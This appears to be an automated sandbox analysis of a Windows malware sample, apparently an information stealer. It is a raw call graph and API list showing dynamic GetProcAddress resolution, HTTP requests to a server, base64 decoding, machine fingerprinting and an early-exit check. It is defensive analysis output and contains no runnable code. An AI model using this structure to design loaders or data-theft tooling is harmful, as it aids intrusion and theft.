38403 ba2fb5 38402->38403 38404 ba4610 2 API calls 38403->38404 38405 ba2fce 38404->38405 38406 ba4610 2 API calls 38405->38406 38407 ba2fe7 38406->38407 38408 ba4610 2 API calls 38407->38408 38409 ba3000 38408->38409 38410 ba4610 2 API calls 38409->38410 38411 ba3019 38410->38411 38412 ba4610 2 API calls 38411->38412 38413 ba3032 38412->38413 38414 ba4610 2 API calls 38413->38414 38415 ba304b 38414->38415 38416 ba4610 2 API calls 38415->38416 38417 ba3064 38416->38417 38418 ba4610 2 API calls 38417->38418 38419 ba307d 38418->38419 38420 ba4610 2 API calls 38419->38420 38421 ba3096 38420->38421 38422 ba4610 2 API calls 38421->38422 38423 ba30af 38422->38423 38424 ba4610 2 API calls 38423->38424 38425 ba30c8 38424->38425 38426 ba4610 2 API calls 38425->38426 38427 ba30e1 38426->38427 38428 ba4610 2 API calls 38427->38428 38429 ba30fa 38428->38429 38430 ba4610 2 API calls 38429->38430 38431 ba3113 38430->38431 38432 ba4610 2 API calls 38431->38432 38433 ba312c 38432->38433 38434 ba4610 2 API calls 38433->38434 38435 ba3145 38434->38435 38436 ba4610 2 API calls 38435->38436 38437 ba315e 38436->38437 38438 ba4610 2 API calls 38437->38438 38439 ba3177 38438->38439 38440 ba4610 2 API calls 38439->38440 38441 ba3190 38440->38441 38442 ba4610 2 API calls 38441->38442 38443 ba31a9 38442->38443 38444 ba4610 2 API calls 38443->38444 38445 ba31c2 38444->38445 38446 ba4610 2 API calls 38445->38446 38447 ba31db 38446->38447 38448 ba4610 2 API calls 38447->38448 38449 ba31f4 38448->38449 38450 ba4610 2 API calls 38449->38450 38451 ba320d 38450->38451 38452 ba4610 2 API calls 38451->38452 38453 ba3226 38452->38453 38454 ba4610 2 API calls 38453->38454 38455 ba323f 38454->38455 38456 ba4610 2 API calls 38455->38456 38457 ba3258 38456->38457 38458 ba4610 2 API calls 38457->38458 38459 ba3271 38458->38459 38460 ba4610 2 API calls 38459->38460 38461 ba328a 38460->38461 38462 ba4610 2 API calls 38461->38462 38463 ba32a3 38462->38463 38464 ba4610 2 API calls 38463->38464 38465 ba32bc 38464->38465 38466 ba4610 2 API calls 38465->38466 38467 ba32d5 38466->38467 38468 ba4610 2 API calls 38467->38468 38469 ba32ee 38468->38469 38470 ba4610 2 API calls 38469->38470 38471 ba3307 38470->38471 38472 ba4610 2 API calls 38471->38472 38473 ba3320 38472->38473 38474 ba4610 2 API calls 38473->38474 38475 ba3339 38474->38475 38476 ba4610 2 API calls 38475->38476 38477 ba3352 38476->38477 38478 ba4610 2 API calls 38477->38478 38479 ba336b 38478->38479 38480 ba4610 2 API calls 38479->38480 38481 ba3384 38480->38481 38482 ba4610 2 API calls 38481->38482 38483 ba339d 38482->38483 38484 ba4610 2 API calls 38483->38484 38485 ba33b6 38484->38485 38486 ba4610 2 API calls 38485->38486 38487 ba33cf 38486->38487 38488 ba4610 2 API calls 38487->38488 38489 ba33e8 38488->38489 38490 ba4610 2 API calls 38489->38490 38491 ba3401 38490->38491 38492 ba4610 2 API calls 38491->38492 38493 ba341a 38492->38493 38494 ba4610 2 API calls 38493->38494 38495 ba3433 38494->38495 38496 ba4610 2 API calls 38495->38496 38497 ba344c 38496->38497 38498 ba4610 2 API calls 38497->38498 38499 ba3465 38498->38499 38500 ba4610 2 API calls 38499->38500 38501 ba347e 38500->38501 38502 ba4610 2 API calls 38501->38502 38503 ba3497 38502->38503 38504 ba4610 2 API calls 38503->38504 38505 ba34b0 38504->38505 38506 ba4610 2 API calls 38505->38506 38507 ba34c9 38506->38507 38508 ba4610 2 API calls 38507->38508 38509 ba34e2 38508->38509 38510 ba4610 2 API calls 38509->38510 38511 ba34fb 38510->38511 38512 ba4610 2 API calls 38511->38512 38513 ba3514 38512->38513 38514 ba4610 2 API calls 38513->38514 38515 ba352d 38514->38515 38516 ba4610 2 API calls 38515->38516 38517 ba3546 38516->38517 38518 ba4610 2 API calls 38517->38518 38519 ba355f 38518->38519 38520 ba4610 2 API calls 38519->38520 38521 ba3578 38520->38521 38522 ba4610 2 API calls 38521->38522 38523 ba3591 38522->38523 38524 ba4610 2 API calls 38523->38524 38525 ba35aa 38524->38525 38526 ba4610 2 API calls 38525->38526 38527 ba35c3 38526->38527 38528 ba4610 2 API calls 38527->38528 38529 ba35dc 38528->38529 38530 ba4610 2 API calls 38529->38530 38531 ba35f5 38530->38531 38532 ba4610 2 API calls 38531->38532 38533 ba360e 38532->38533 38534 ba4610 2 API calls 38533->38534 38535 ba3627 38534->38535 38536 ba4610 2 API calls 38535->38536 38537 ba3640 38536->38537 38538 ba4610 2 API calls 38537->38538 38539 ba3659 38538->38539 38540 ba4610 2 API calls 38539->38540 38541 ba3672 38540->38541 38542 ba4610 2 API calls 38541->38542 38543 ba368b 38542->38543 38544 ba4610 2 API calls 38543->38544 38545 ba36a4 38544->38545 38546 ba4610 2 API calls 38545->38546 38547 ba36bd 38546->38547 38548 ba4610 2 API calls 38547->38548 38549 ba36d6 38548->38549 38550 ba4610 2 API calls 38549->38550 38551 ba36ef 38550->38551 38552 ba4610 2 API calls 38551->38552 38553 ba3708 38552->38553 38554 ba4610 2 API calls 38553->38554 38555 ba3721 38554->38555 38556 ba4610 2 API calls 38555->38556 38557 ba373a 38556->38557 38558 ba4610 2 API calls 38557->38558 38559 ba3753 38558->38559 38560 ba4610 2 API calls 38559->38560 38561 ba376c 38560->38561 38562 ba4610 2 API calls 38561->38562 38563 ba3785 38562->38563 38564 ba4610 2 API calls 38563->38564 38565 ba379e 38564->38565 38566 ba4610 2 API calls 38565->38566 38567 ba37b7 38566->38567 38568 ba4610 2 API calls 38567->38568 38569 ba37d0 38568->38569 38570 ba4610 2 API calls 38569->38570 38571 ba37e9 38570->38571 38572 ba4610 2 API calls 38571->38572 38573 ba3802 38572->38573 38574 ba4610 2 API calls 38573->38574 38575 ba381b 38574->38575 38576 ba4610 2 API calls 38575->38576 38577 ba3834 38576->38577 38578 ba4610 2 API calls 38577->38578 38579 ba384d 38578->38579 38580 ba4610 2 API calls 38579->38580 38581 ba3866 38580->38581 38582 ba4610 2 API calls 38581->38582 38583 ba387f 38582->38583 38584 ba4610 2 API calls 38583->38584 38585 ba3898 38584->38585 38586 ba4610 2 API calls 38585->38586 38587 ba38b1 38586->38587 38588 ba4610 2 API calls 38587->38588 38589 ba38ca 38588->38589 38590 ba4610 2 API calls 38589->38590 38591 ba38e3 38590->38591 38592 ba4610 2 API calls 38591->38592 38593 ba38fc 38592->38593 38594 ba4610 2 API calls 38593->38594 38595 ba3915 38594->38595 38596 ba4610 2 API calls 38595->38596 38597 ba392e 38596->38597 38598 ba4610 2 API calls 38597->38598 38599 ba3947 38598->38599 38600 ba4610 2 API calls 38599->38600 38601 ba3960 38600->38601 38602 ba4610 2 API calls 38601->38602 38603 ba3979 38602->38603 38604 ba4610 2 API calls 38603->38604 38605 ba3992 38604->38605 38606 ba4610 2 API calls 38605->38606 38607 ba39ab 38606->38607 38608 ba4610 2 API calls 38607->38608 38609 ba39c4 38608->38609 38610 ba4610 2 API calls 38609->38610 38611 ba39dd 38610->38611 38612 ba4610 2 API calls 38611->38612 38613 ba39f6 38612->38613 38614 ba4610 2 API calls 38613->38614 38615 ba3a0f 38614->38615 38616 ba4610 2 API calls 38615->38616 38617 ba3a28 38616->38617 38618 ba4610 2 API calls 38617->38618 38619 ba3a41 38618->38619 38620 ba4610 2 API calls 38619->38620 38621 ba3a5a 38620->38621 38622 ba4610 2 API calls 38621->38622 38623 ba3a73 38622->38623 38624 ba4610 2 API calls 38623->38624 38625 ba3a8c 38624->38625 38626 ba4610 2 API calls 38625->38626 38627 ba3aa5 38626->38627 38628 ba4610 2 API calls 38627->38628 38629 ba3abe 38628->38629 38630 ba4610 2 API calls 38629->38630 38631 ba3ad7 38630->38631 38632 ba4610 2 API calls 38631->38632 38633 ba3af0 38632->38633 38634 ba4610 2 API calls 38633->38634 38635 ba3b09 38634->38635 38636 ba4610 2 API calls 38635->38636 38637 ba3b22 38636->38637 38638 ba4610 2 API calls 38637->38638 38639 ba3b3b 38638->38639 38640 ba4610 2 API calls 38639->38640 38641 ba3b54 38640->38641 38642 ba4610 2 API calls 38641->38642 38643 ba3b6d 38642->38643 38644 ba4610 2 API calls 38643->38644 38645 ba3b86 38644->38645 38646 ba4610 2 API calls 38645->38646 38647 ba3b9f 38646->38647 38648 ba4610 2 API calls 38647->38648 38649 ba3bb8 38648->38649 38650 ba4610 2 API calls 38649->38650 38651 ba3bd1 38650->38651 38652 ba4610 2 API calls 38651->38652 38653 ba3bea 38652->38653 38654 ba4610 2 API calls 38653->38654 38655 ba3c03 38654->38655 38656 ba4610 2 API calls 38655->38656 38657 ba3c1c 38656->38657 38658 ba4610 2 API calls 38657->38658 38659 ba3c35 38658->38659 38660 ba4610 2 API calls 38659->38660 38661 ba3c4e 38660->38661 38662 ba4610 2 API calls 38661->38662 38663 ba3c67 38662->38663 38664 ba4610 2 API calls 38663->38664 38665 ba3c80 38664->38665 38666 ba4610 2 API calls 38665->38666 38667 ba3c99 38666->38667 38668 ba4610 2 API calls 38667->38668 38669 ba3cb2 38668->38669 38670 ba4610 2 API calls 38669->38670 38671 ba3ccb 38670->38671 38672 ba4610 2 API calls 38671->38672 38673 ba3ce4 38672->38673 38674 ba4610 2 API calls 38673->38674 38675 ba3cfd 38674->38675 38676 ba4610 2 API calls 38675->38676 38677 ba3d16 38676->38677 38678 ba4610 2 API calls 38677->38678 38679 ba3d2f 38678->38679 38680 ba4610 2 API calls 38679->38680 38681 ba3d48 38680->38681 38682 ba4610 2 API calls 38681->38682 38683 ba3d61 38682->38683 38684 ba4610 2 API calls 38683->38684 38685 ba3d7a 38684->38685 38686 ba4610 2 API calls 38685->38686 38687 ba3d93 38686->38687 38688 ba4610 2 API calls 38687->38688 38689 ba3dac 38688->38689 38690 ba4610 2 API calls 38689->38690 38691 ba3dc5 38690->38691 38692 ba4610 2 API calls 38691->38692 38693 ba3dde 38692->38693 38694 ba4610 2 API calls 38693->38694 38695 ba3df7 38694->38695 38696 ba4610 2 API calls 38695->38696 38697 ba3e10 38696->38697 38698 ba4610 2 API calls 38697->38698 38699 ba3e29 38698->38699 38700 ba4610 2 API calls 38699->38700 38701 ba3e42 38700->38701 38702 ba4610 2 API calls 38701->38702 38703 ba3e5b 38702->38703 38704 ba4610 2 API calls 38703->38704 38705 ba3e74 38704->38705 38706 ba4610 2 API calls 38705->38706 38707 ba3e8d 38706->38707 38708 ba4610 2 API calls 38707->38708 38709 ba3ea6 38708->38709 38710 ba4610 2 API calls 38709->38710 38711 ba3ebf 38710->38711 38712 ba4610 2 API calls 38711->38712 38713 ba3ed8 38712->38713 38714 ba4610 2 API calls 38713->38714 38715 ba3ef1 38714->38715 38716 ba4610 2 API calls 38715->38716 38717 ba3f0a 38716->38717 38718 ba4610 2 API calls 38717->38718 38719 ba3f23 38718->38719 38720 ba4610 2 API calls 38719->38720 38721 ba3f3c 38720->38721 38722 ba4610 2 API calls 38721->38722 38723 ba3f55 38722->38723 38724 ba4610 2 API calls 38723->38724 38725 ba3f6e 38724->38725 38726 ba4610 2 API calls 38725->38726 38727 ba3f87 38726->38727 38728 ba4610 2 API calls 38727->38728 38729 ba3fa0 38728->38729 38730 ba4610 2 API calls 38729->38730 38731 ba3fb9 38730->38731 38732 ba4610 2 API calls 38731->38732 38733 ba3fd2 38732->38733 38734 ba4610 2 API calls 38733->38734 38735 ba3feb 38734->38735 38736 ba4610 2 API calls 38735->38736 38737 ba4004 38736->38737 38738 ba4610 2 API calls 38737->38738 38739 ba401d 38738->38739 38740 ba4610 2 API calls 38739->38740 38741 ba4036 38740->38741 38742 ba4610 2 API calls 38741->38742 38743 ba404f 38742->38743 38744 ba4610 2 API calls 38743->38744 38745 ba4068 38744->38745 38746 ba4610 2 API calls 38745->38746 38747 ba4081 38746->38747 38748 ba4610 2 API calls 38747->38748 38749 ba409a 38748->38749 38750 ba4610 2 API calls 38749->38750 38751 ba40b3 38750->38751 38752 ba4610 2 API calls 38751->38752 38753 ba40cc 38752->38753 38754 ba4610 2 API calls 38753->38754 38755 ba40e5 38754->38755 38756 ba4610 2 API calls 38755->38756 38757 ba40fe 38756->38757 38758 ba4610 2 API calls 38757->38758 38759 ba4117 38758->38759 38760 ba4610 2 API calls 38759->38760 38761 ba4130 38760->38761 38762 ba4610 2 API calls 38761->38762 38763 ba4149 38762->38763 38764 ba4610 2 API calls 38763->38764 38765 ba4162 38764->38765 38766 ba4610 2 API calls 38765->38766 38767 ba417b 38766->38767 38768 ba4610 2 API calls 38767->38768 38769 ba4194 38768->38769 38770 ba4610 2 API calls 38769->38770 38771 ba41ad 38770->38771 38772 ba4610 2 API calls 38771->38772 38773 ba41c6 38772->38773 38774 ba4610 2 API calls 38773->38774 38775 ba41df 38774->38775 38776 ba4610 2 API calls 38775->38776 38777 ba41f8 38776->38777 38778 ba4610 2 API calls 38777->38778 38779 ba4211 38778->38779 38780 ba4610 2 API calls 38779->38780 38781 ba422a 38780->38781 38782 ba4610 2 API calls 38781->38782 38783 ba4243 38782->38783 38784 ba4610 2 API calls 38783->38784 38785 ba425c 38784->38785 38786 ba4610 2 API calls 38785->38786 38787 ba4275 38786->38787 38788 ba4610 2 API calls 38787->38788 38789 ba428e 38788->38789 38790 ba4610 2 API calls 38789->38790 38791 ba42a7 38790->38791 38792 ba4610 2 API calls 38791->38792 38793 ba42c0 38792->38793 38794 ba4610 2 API calls 38793->38794 38795 ba42d9 38794->38795 38796 ba4610 2 API calls 38795->38796 38797 ba42f2 38796->38797 38798 ba4610 2 API calls 38797->38798 38799 ba430b 38798->38799 38800 ba4610 2 API calls 38799->38800 38801 ba4324 38800->38801 38802 ba4610 2 API calls 38801->38802 38803 ba433d 38802->38803 38804 ba4610 2 API calls 38803->38804 38805 ba4356 38804->38805 38806 ba4610 2 API calls 38805->38806 38807 ba436f 38806->38807 38808 ba4610 2 API calls 38807->38808 38809 ba4388 38808->38809 38810 ba4610 2 API calls 38809->38810 38811 ba43a1 38810->38811 38812 ba4610 2 API calls 38811->38812 38813 ba43ba 38812->38813 38814 ba4610 2 API calls 38813->38814 38815 ba43d3 38814->38815 38816 ba4610 2 API calls 38815->38816 38817 ba43ec 38816->38817 38818 ba4610 2 API calls 38817->38818 38819 ba4405 38818->38819 38820 ba4610 2 API calls 38819->38820 38821 ba441e 38820->38821 38822 ba4610 2 API calls 38821->38822 38823 ba4437 38822->38823 38824 ba4610 2 API calls 38823->38824 38825 ba4450 38824->38825 38826 ba4610 2 API calls 38825->38826 38827 ba4469 38826->38827 38828 ba4610 2 API calls 38827->38828 38829 ba4482 38828->38829 38830 ba4610 2 API calls 38829->38830 38831 ba449b 38830->38831 38832 ba4610 2 API calls 38831->38832 38833 ba44b4 38832->38833 38834 ba4610 2 API calls 38833->38834 38835 ba44cd 38834->38835 38836 ba4610 2 API calls 38835->38836 38837 ba44e6 38836->38837 38838 ba4610 2 API calls 38837->38838 38839 ba44ff 38838->38839 38840 ba4610 2 API calls 38839->38840 38841 ba4518 38840->38841 38842 ba4610 2 API calls 38841->38842 38843 ba4531 38842->38843 38844 ba4610 2 API calls 38843->38844 38845 ba454a 38844->38845 38846 ba4610 2 API calls 38845->38846 38847 ba4563 38846->38847 38848 ba4610 2 API calls 38847->38848 38849 ba457c 38848->38849 38850 ba4610 2 API calls 38849->38850 38851 ba4595 38850->38851 38852 ba4610 2 API calls 38851->38852 38853 ba45ae 38852->38853 38854 ba4610 2 API calls 38853->38854 38855 ba45c7 38854->38855 38856 ba4610 2 API calls 38855->38856 38857 ba45e0 38856->38857 38858 ba4610 2 API calls 38857->38858 38859 ba45f9 38858->38859 38860 bb9f20 38859->38860 38861 bb9f30 43 API calls 38860->38861 38862 bba346 8 API calls 38860->38862 38861->38862 38863 bba3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38862->38863 38864 bba456 38862->38864 38863->38864 38865 bba463 8 API calls 38864->38865 38866 bba526 38864->38866 38865->38866 38867 bba5a8 38866->38867 38868 bba52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38866->38868 38869 bba647 38867->38869 38870 bba5b5 6 API calls 38867->38870 38868->38867 38871 bba72f 38869->38871 38872 bba654 9 API calls 38869->38872 38870->38869 38873 bba738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38871->38873 38874 bba7b2 38871->38874 38872->38871 38873->38874 38875 bba7bb GetProcAddress GetProcAddress 38874->38875 38876 bba7ec 38874->38876 38875->38876 38877 bba825 38876->38877 38878 bba7f5 GetProcAddress GetProcAddress 38876->38878 38879 bba922 38877->38879 38880 bba832 10 API calls 38877->38880 38878->38877 38881 bba92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38879->38881 38882 bba98d 38879->38882 38880->38879 38881->38882 38883 bba9ae 38882->38883 38884 bba996 GetProcAddress 38882->38884 38885 bb5ef3 38883->38885 38886 bba9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38883->38886 38884->38883 38887 ba1590 38885->38887 38886->38885 39157 ba16b0 38887->39157 38890 bbaab0 lstrcpy 38891 ba15b5 38890->38891 38892 bbaab0 lstrcpy 38891->38892 38893 ba15c7 38892->38893 38894 bbaab0 lstrcpy 38893->38894 38895 ba15d9 38894->38895 38896 bbaab0 lstrcpy 38895->38896 38897 ba1663 38896->38897 38898 bb5760 38897->38898 38899 bb5771 38898->38899 38900 bbab30 2 API calls 38899->38900 38901 bb577e 38900->38901 38902 bbab30 2 API calls 38901->38902 38903 bb578b 38902->38903 38904 bbab30 2 API calls 38903->38904 38905 bb5798 38904->38905 38906 bbaa50 lstrcpy 38905->38906 38907 bb57a5 38906->38907 38908 bbaa50 lstrcpy 38907->38908 38909 bb57b2 38908->38909 38910 bbaa50 lstrcpy 38909->38910 38911 bb57bf 38910->38911 38912 bbaa50 lstrcpy 38911->38912 38944 bb57cc 38912->38944 38913 bbaa50 lstrcpy 38913->38944 38914 bbab30 lstrlen lstrcpy 38914->38944 38915 bb5893 StrCmpCA 38915->38944 38916 bb58f0 StrCmpCA 38917 bb5a2c 38916->38917 38916->38944 38919 bbabb0 lstrcpy 38917->38919 38918 bbaab0 lstrcpy 38918->38944 38920 bb5a38 38919->38920 38921 bbab30 2 API calls 38920->38921 38922 bb5a46 38921->38922 38925 bbab30 2 API calls 38922->38925 38923 bb5aa6 StrCmpCA 38926 bb5be1 38923->38926 38923->38944 38924 bb5440 20 API calls 38924->38944 38928 bb5a55 38925->38928 38927 bbabb0 lstrcpy 38926->38927 38929 bb5bed 38927->38929 38930 ba16b0 lstrcpy 38928->38930 38931 bbab30 2 API calls 38929->38931 38932 bb5a61 38930->38932 38933 bb5bfb 38931->38933 38932->38005 38936 bbab30 2 API calls 38933->38936 38934 bb5c5b StrCmpCA 38937 bb5c78 38934->38937 38938 bb5c66 Sleep 38934->38938 38935 bb5510 25 API calls 38935->38944 38939 bb5c0a 38936->38939 38940 bbabb0 lstrcpy 38937->38940 38938->38944 38941 ba16b0 lstrcpy 38939->38941 38942 bb5c84 38940->38942 38941->38932 38943 bbab30 2 API calls 38942->38943 38945 bb5c93 38943->38945 38944->38913 38944->38914 38944->38915 38944->38916 38944->38918 38944->38923 38944->38924 38944->38934 38944->38935 38947 bb59da StrCmpCA 38944->38947 38950 bb5b8f StrCmpCA 38944->38950 38951 bbabb0 lstrcpy 38944->38951 38952 ba1590 lstrcpy 38944->38952 38946 bbab30 2 API calls 38945->38946 38948 bb5ca2 38946->38948 38947->38944 38949 ba16b0 lstrcpy 38948->38949 38949->38932 38950->38944 38951->38944 38952->38944 38954 bb76dc 38953->38954 38955 bb76e3 GetVolumeInformationA 38953->38955 38954->38955 38959 bb7721 38955->38959 38956 bb778c GetProcessHeap RtlAllocateHeap 38957 bb77a9 38956->38957 38958 bb77b8 wsprintfA 38956->38958 38960 bbaa50 lstrcpy 38957->38960 38961 bbaa50 lstrcpy 38958->38961 38959->38956 38962 bb5ff7 38960->38962 38961->38962 38962->38026 38964 bbaab0 lstrcpy 38963->38964 38965 ba48e9 38964->38965 39166 ba4800 38965->39166 38967 ba48f5 38968 bbaa50 lstrcpy 38967->38968 38969 ba4927 38968->38969 38970 bbaa50 lstrcpy 38969->38970 38971 ba4934 38970->38971 38972 bbaa50 lstrcpy 38971->38972 38973 ba4941 38972->38973 38974 bbaa50 lstrcpy 38973->38974 38975 ba494e 38974->38975 38976 bbaa50 lstrcpy 38975->38976 38977 ba495b InternetOpenA StrCmpCA 38976->38977 38978 ba4994 38977->38978 38979 ba4f1b InternetCloseHandle 38978->38979 39172 bb8cf0 38978->39172 38981 ba4f38 38979->38981 39187 baa210 CryptStringToBinaryA 38981->39187 38982 ba49b3 39180 bbac30 38982->39180 38985 ba49c6 38987 bbabb0 lstrcpy 38985->38987 38992 ba49cf 38987->38992 38988 bbab30 2 API calls 38989 ba4f55 38988->38989 38990 bbacc0 4 API calls 38989->38990 38993 ba4f6b 38990->38993 38991 ba4f77 codecvt 38995 bbaab0 lstrcpy 38991->38995 38996 bbacc0 4 API calls 38992->38996 38994 bbabb0 lstrcpy 38993->38994 38994->38991 39008 ba4fa7 38995->39008 38997 ba49f9 38996->38997 38998 bbabb0 lstrcpy 38997->38998 38999 ba4a02 38998->38999 39000 bbacc0 4 API calls 38999->39000 39001 ba4a21 39000->39001 39002 bbabb0 lstrcpy 39001->39002 39003 ba4a2a 39002->39003 39004 bbac30 3 API calls 39003->39004 39005 ba4a48 39004->39005 39006 bbabb0 lstrcpy 39005->39006 39007 ba4a51 39006->39007 39009 bbacc0 4 API calls 39007->39009 39008->38029 39010 ba4a70 39009->39010 39011 bbabb0 lstrcpy 39010->39011 39012 ba4a79 39011->39012 39013 bbacc0 4 API calls 39012->39013 39014 ba4a98 39013->39014 39015 bbabb0 lstrcpy 39014->39015 39016 ba4aa1 39015->39016 39017 bbacc0 4 API calls 39016->39017 39018 ba4acd 39017->39018 39019 bbac30 3 API calls 39018->39019 39020 ba4ad4 39019->39020 39021 bbabb0 lstrcpy 39020->39021 39022 ba4add 39021->39022 39023 ba4af3 InternetConnectA 39022->39023 39023->38979 39024 ba4b23 HttpOpenRequestA 39023->39024 39026 ba4b78 39024->39026 39027 ba4f0e InternetCloseHandle 39024->39027 39028 bbacc0 4 API calls 39026->39028 39027->38979 39029 ba4b8c 39028->39029 39030 bbabb0 lstrcpy 39029->39030 39031 ba4b95 39030->39031 39032 bbac30 3 API calls 39031->39032 39033 ba4bb3 39032->39033 39034 bbabb0 lstrcpy 39033->39034 39035 ba4bbc 39034->39035 39036 bbacc0 4 API calls 39035->39036 39037 ba4bdb 39036->39037 39038 bbabb0 lstrcpy 39037->39038 39039 ba4be4 39038->39039 39040 bbacc0 4 API calls 39039->39040 39041 ba4c05 39040->39041 39042 bbabb0 lstrcpy 39041->39042 39043 ba4c0e 39042->39043 39044 bbacc0 4 API calls 39043->39044 39045 ba4c2e 39044->39045 39046 bbabb0 lstrcpy 39045->39046 39047 ba4c37 39046->39047 39048 bbacc0 4 API calls 39047->39048 39049 ba4c56 39048->39049 39050 bbabb0 lstrcpy 39049->39050 39051 ba4c5f 39050->39051 39052 bbac30 3 API calls 39051->39052 39053 ba4c7d 39052->39053 39054 bbabb0 lstrcpy 39053->39054 39055 ba4c86 39054->39055 39056 bbacc0 4 API calls 39055->39056 39057 ba4ca5 39056->39057 39058 bbabb0 lstrcpy 39057->39058 39059 ba4cae 39058->39059 39060 bbacc0 4 API calls 39059->39060 39061 ba4ccd 39060->39061 39062 bbabb0 lstrcpy 39061->39062 39063 ba4cd6 39062->39063 39064 bbac30 3 API calls 39063->39064 39065 ba4cf4 39064->39065 39066 bbabb0 lstrcpy 39065->39066 39067 ba4cfd 39066->39067 39068 bbacc0 4 API calls 39067->39068 39069 ba4d1c 39068->39069 39070 bbabb0 lstrcpy 39069->39070 39071 ba4d25 39070->39071 39072 bbacc0 4 API calls 39071->39072 39073 ba4d46 39072->39073 39074 bbabb0 lstrcpy 39073->39074 39075 ba4d4f 39074->39075 39076 bbacc0 4 API calls 39075->39076 39077 ba4d6f 39076->39077 39078 bbabb0 lstrcpy 39077->39078 39079 ba4d78 39078->39079 39080 bbacc0 4 API calls 39079->39080 39081 ba4d97 39080->39081 39082 bbabb0 lstrcpy 39081->39082 39083 ba4da0 39082->39083 39084 bbac30 3 API calls 39083->39084 39085 ba4dbe 39084->39085 39086 bbabb0 lstrcpy 39085->39086 39087 ba4dc7 39086->39087 39088 bbaa50 lstrcpy 39087->39088 39089 ba4de2 39088->39089 39090 bbac30 3 API calls 39089->39090 39091 ba4e03 39090->39091 39092 bbac30 3 API calls 39091->39092 39093 ba4e0a 39092->39093 39094 bbabb0 lstrcpy 39093->39094 39095 ba4e16 39094->39095 39096 ba4e37 lstrlen 39095->39096 39097 ba4e4a 39096->39097 39098 ba4e53 lstrlen 39097->39098 39186 bbade0 39098->39186 39100 ba4e63 HttpSendRequestA 39101 ba4e82 InternetReadFile 39100->39101 39102 ba4eb7 InternetCloseHandle 39101->39102 39107 ba4eae 39101->39107 39105 bbab10 39102->39105 39104 bbacc0 4 API calls 39104->39107 39105->39027 39106 bbabb0 lstrcpy 39106->39107 39107->39101 39107->39102 39107->39104 39107->39106 39193 bbade0 39108->39193 39110 bb1a14 StrCmpCA 39111 bb1a1f ExitProcess 39110->39111 39113 bb1a27 39110->39113 39112 bb1c12 39112->38031 39113->39112 39114 bb1b1f StrCmpCA 39113->39114 39115 bb1afd StrCmpCA 39113->39115 39116 bb1acf StrCmpCA 39113->39116 39117 bb1aad StrCmpCA 39113->39117 39118 bb1b63 StrCmpCA 39113->39118 39119 bb1b82 StrCmpCA 39113->39119 39120 bb1b41 StrCmpCA 39113->39120 39121 bb1ba1 StrCmpCA 39113->39121 39122 bb1bc0 StrCmpCA 39113->39122 39123 bbab30 lstrlen lstrcpy 39113->39123 39114->39113 39115->39113 39116->39113 39117->39113 39118->39113 39119->39113 39120->39113 39121->39113 39122->39113 39123->39113 39124->38037 39125->38039 39126->38045 39127->38047 39128->38053 39129->38055 39130->38059 39131->38063 39132->38067 39133->38073 39134->38075 39135->38079 39136->38092 39137->38096 39138->38097 39139->38093 39140->38097 39141->38112 39142->38099 39143->38103 39144->38104 39145->38109 39146->38114 39147->38116 39148->38123 39149->38130 39150->38150 39151->38154 39152->38153 39153->38149 39154->38153 39155->38163 39158 bbaab0 lstrcpy 39157->39158 39159 ba16c3 39158->39159 39160 bbaab0 lstrcpy 39159->39160 39161 ba16d5 39160->39161 39162 bbaab0 lstrcpy 39161->39162 39163 ba16e7 39162->39163 39164 bbaab0 lstrcpy 39163->39164 39165 ba15a3 39164->39165 39165->38890 39167 ba4816 39166->39167 39168 ba4888 lstrlen 39167->39168 39192 bbade0 39168->39192 39170 ba4898 InternetCrackUrlA 39171 ba48b7 39170->39171 39171->38967 39173 bbaa50 lstrcpy 39172->39173 39174 bb8d04 39173->39174 39175 bbaa50 lstrcpy 39174->39175 39176 bb8d12 GetSystemTime 39175->39176 39178 bb8d29 39176->39178 39177 bbaab0 lstrcpy 39179 bb8d8c 39177->39179 39178->39177 39179->38982 39181 bbac41 39180->39181 39182 bbac98 39181->39182 39184 bbac78 lstrcpy lstrcat 39181->39184 39183 bbaab0 lstrcpy 39182->39183 39185 bbaca4 39183->39185 39184->39182 39185->38985 39186->39100 39188 ba4f3e 39187->39188 39189 baa249 LocalAlloc 39187->39189 39188->38988 39188->38991 39189->39188 39190 baa264 CryptStringToBinaryA 39189->39190 39190->39188 39191 baa289 LocalFree 39190->39191 39191->39188 39192->39170 39193->39110

                                  Executed Functions

                                  Function 00BB9BB0 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 bb9bb0-bb9bc4 call bb9aa0 663 bb9bca-bb9dde call bb9ad0 GetProcAddress * 21 660->663 664 bb9de3-bb9e42 LoadLibraryA * 5 660->664 663->664 666 bb9e5d-bb9e64 664->666 667 bb9e44-bb9e58 GetProcAddress 664->667 668 bb9e96-bb9e9d 666->668 669 bb9e66-bb9e91 GetProcAddress * 2 666->669 667->666 671 bb9eb8-bb9ebf 668->671 672 bb9e9f-bb9eb3 GetProcAddress 668->672 669->668 673 bb9ed9-bb9ee0 671->673 674 bb9ec1-bb9ed4 GetProcAddress 671->674 672->671 675 bb9ee2-bb9f0c GetProcAddress * 2 673->675 676 bb9f11-bb9f12 673->676 674->673 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01301358), ref: 00BB9BF1
                                  • GetProcAddress.KERNEL32(75900000,01301208), ref: 00BB9C0A
                                  • GetProcAddress.KERNEL32(75900000,01301250), ref: 00BB9C22
                                  • GetProcAddress.KERNEL32(75900000,01301130), ref: 00BB9C3A
                                  • GetProcAddress.KERNEL32(75900000,013011D8), ref: 00BB9C53
                                  • GetProcAddress.KERNEL32(75900000,01309548), ref: 00BB9C6B
                                  • GetProcAddress.KERNEL32(75900000,012F6E68), ref: 00BB9C83
                                  • GetProcAddress.KERNEL32(75900000,012F7188), ref: 00BB9C9C
                                  • GetProcAddress.KERNEL32(75900000,01301160), ref: 00BB9CB4
                                  • GetProcAddress.KERNEL32(75900000,01301178), ref: 00BB9CCC
                                  • GetProcAddress.KERNEL32(75900000,013012C8), ref: 00BB9CE5
                                  • GetProcAddress.KERNEL32(75900000,01301190), ref: 00BB9CFD
                                  • GetProcAddress.KERNEL32(75900000,012F71A8), ref: 00BB9D15
                                  • GetProcAddress.KERNEL32(75900000,013011F0), ref: 00BB9D2E
